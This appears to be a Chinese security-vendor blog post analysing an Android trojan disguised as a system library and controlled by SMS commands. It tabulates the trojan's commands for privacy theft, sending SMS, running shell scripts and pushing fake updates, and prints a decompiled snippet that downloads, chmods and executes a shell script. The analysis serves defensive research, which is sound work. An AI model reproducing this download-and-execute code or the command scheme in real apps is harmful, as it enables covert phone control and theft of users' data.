post by 南山
AVL移动安全团队最近发现了另一例Android下短信指令控制木马,其接受短信指令执行用户隐私上传、发送指定短信等等,除此外还具备执行任意shell脚本命令。
样本分析
样本基本信息:
| 包名 | com.security.update |
| 应用程序名 | Android Runtime Library |
| 文件大小 | 73,791字节 |
该木马首次运行时会发送短信通知控制者(默认控制者手机号码:1503****394),然后注册短信接收器,监听短信指令。
短信指令对照表:
| 短信指令 | 行为描述 |
|---|---|
| c001#手机号码 | 设置控制者的手机号码 |
| c005#uploadurl | 设置上传用户隐私信息的URL |
| c006#手机号码 | 设置上传手机联系人信息的手机号码 |
| c007#downloadurl | 设置下载文件的URL |
| c100#手机号码%短信内容 | 发送指定的短信 |
| c101#shell脚本 | 执行shell脚本 |
| c102#FileName | 下载指定的文件 |
| c201# | 获取联系人信息,加密发送到指定的手机上 |
| c202# | 下载配置信息 |
| c999#FileName | 下载更新版本,通知栏弹出假的系统更新信息,用户点击后,弹出安装界面 |
以下以其中的三个短信指令为例来说明:
c100#手机号码%短信内容
可以看到木马将指定内容短信发送到指定手机号码
c101#shell脚本
该木马支持两种方式执行shell命令,这里以执行mkdir命令来进行验证:
1.执行短信指令中指定shell命令
此时,在指定目录下创建了test1目录:
2.运行短信指令中指定的shell脚本
此时,在指定目录下创建了test2目录:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
String v1 = SecurityUpdate.a().getCacheDir() + "/tmp"; File v0 = new File(v1); if(!v0.exists()) { v0.mkdirs(); } g.a(String.valueOf(v1) + "/" + this.a);//下载shell脚本 try { //修改下载的脚本的执行权限 BufferedWriter v2 = new BufferedWriter(new OutputStreamWriter(Runtime.getRuntime().exec("/system/bin/sh -").getOutputStream())); v2.write("cd " + v1 + "; " + "chmod 755 " + this.a + "; " + "./" + this.a); v2.flush(); v2.close(); } |
c200#intNum#intNum
在接收此短信指令后,木马会读取通话记录和短信箱内容,以及设备信息,并存放在sdcard路径下,以备后续上传到指定URL。
小结
该木马是一类功能全面的短信指令控制木马,并且增加了对shell命令的执行,通过下载任意指定URL的文件指令和执行shell命令相结合,可以完成执行任意shell命令的功能,使用户手机暴露在更大的威胁之下。
用户可以下载AVL移动安全团队AVL Pro对此木马进行查杀
“另一例Android下短信指令控制木马”,为什么要说“另”?